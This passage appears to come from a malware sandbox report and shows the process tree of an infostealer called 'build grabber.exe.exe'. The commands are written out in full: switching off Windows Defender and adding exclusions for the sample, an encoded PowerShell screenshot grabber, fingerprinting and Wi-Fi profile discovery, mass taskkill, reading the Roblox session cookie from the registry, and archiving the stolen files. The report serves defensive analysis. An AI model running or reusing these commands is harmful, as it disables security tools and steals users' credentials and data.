      C:\Windows\system32\cmd.exe /c "net session"
      4⤵
      PID:4396
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        
        PID:5556
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:5676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\build grabber.exe.exe'"
      4⤵
      PID:5412
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\build grabber.exe.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6152
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
      4⤵
      PID:5456
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NEXT TIME DONT DOWNLOAD RANDOM FILES HAHAHAH', 0, 'GET BEAMED', 0+16);close()""
      4⤵
      PID:5472
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NEXT TIME DONT DOWNLOAD RANDOM FILES HAHAHAH', 0, 'GET BEAMED', 0+16);close()"
        5⤵
        
        PID:5904
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5328
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6036
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5520
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:6672
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:7156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:1544
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:6440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5796
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:6908
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5396
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:6440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'"
      4⤵
      PID:5608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:7676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2640
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7144
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:7304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6060
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:7424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:7484
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:8120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:7520
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7248
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bsmx0iku\bsmx0iku.cmdline"
        6⤵
        
        PID:5944
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF6D3.tmp" "c:\Users\Admin\AppData\Local\Temp\bsmx0iku\CSCF28087D4F7304947AC12058B4FEB843.TMP"
        7⤵
        
        PID:5620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "Camera.exe /devlist"
      4⤵
      PID:7664
    - - C:\Users\Admin\AppData\Local\Temp\_MEI54362\Camera.exe
        
        Camera.exe /devlist
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4936"
      4⤵
      PID:5356
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4936
        5⤵
        Kills process with taskkill
        
        PID:6676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2468"
      4⤵
      PID:7044
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2468
        5⤵
        Kills process with taskkill
        
        PID:6028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2360"
      4⤵
      PID:4884
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2360
        5⤵
        Kills process with taskkill
        
        PID:6356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3428"
      4⤵
      PID:6268
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3428
        5⤵
        Kills process with taskkill
        
        PID:7644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 408"
      4⤵
      PID:7020
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 408
        5⤵
        Kills process with taskkill
        
        PID:5936
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 912"
      4⤵
      PID:7420
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 912
        5⤵
        Kills process with taskkill
        
        PID:6800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2724"
      4⤵
      PID:6876
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2724
        5⤵
        Kills process with taskkill
        
        PID:6308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 540"
      4⤵
      PID:6724
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 540
        5⤵
        Kills process with taskkill
        
        PID:7528
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 776"
      4⤵
      PID:8144
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 776
        5⤵
        Kills process with taskkill
        
        PID:5608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2560"
      4⤵
      PID:7572
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2560
        5⤵
        Kills process with taskkill
        
        PID:6204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:6252
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6984
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:6756
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6716
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:6172
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI54362\rar.exe a -r -hpblank "C:\Users\Admin\AppData\Local\Temp\QpXBS.zip" *"
      4⤵
      PID:5876
    - - C:\Users\Admin\AppData\Local\Temp\_MEI54362\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI54362\rar.exe a -r -hpblank "C:\Users\Admin\AppData\Local\Temp\QpXBS.zip" *
        5⤵
        Executes dropped EXE
        
        PID:2320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:3116
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:7832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:5324
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:7496
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:7272
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:7244
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5784
- C:\Users\Admin\Downloads\build grabber.exe.exe
  "C:\Users\Admin\Downloads\build grabber.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:5284
- - C:\Users\Admin\Downloads\build grabber.exe.exe
    "C:\Users\Admin\Downloads\build grabber.exe.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "net session"
      4⤵
      PID:5940
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        
        PID:5424
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:5156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\build grabber.exe.exe'"
      4⤵
      PID:5672
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\build grabber.exe.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
      4⤵
      PID:5744
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6912
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NEXT TIME DONT DOWNLOAD RANDOM FILES HAHAHAH', 0, 'GET BEAMED', 0+16);close()""
      4⤵
      PID:5884
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NEXT TIME DONT DOWNLOAD RANDOM FILES HAHAHAH', 0, 'GET BEAMED', 0+16);close()"
        5⤵
        
        PID:6640
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5988
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:6632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5212
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:6544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:5432
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:6420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:6628
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:6320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5512
    - - C:\Windows\System32\Wbem\WMIC.exe
        
